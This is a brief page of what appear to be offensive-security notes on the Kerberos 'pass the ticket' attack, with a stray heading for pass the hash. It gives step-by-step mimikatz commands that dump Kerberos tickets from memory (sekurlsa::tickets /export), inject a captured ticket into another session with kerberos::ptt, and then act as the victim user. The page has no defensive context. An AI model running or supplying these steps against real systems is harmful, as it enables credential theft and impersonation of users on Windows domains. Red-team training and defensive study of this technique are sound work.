Pass the hash attack

Pass the ticket

Generate a TGS ticket from authorized user session

  • ./mimikatz.exe

  • privilege::debug

  • sekurlsa::tickets /export

  • dir *.kirbi

Select any ticket and copy its name and send to unauthorized user’s session

  • kerberos::ptt <ticket-name>

  • klist to verify if session is generated or not

  • now we can perform action on the behalf of another user whose ticket was captured

PreviousSilver Ticket AttackNextPersistence

Last updated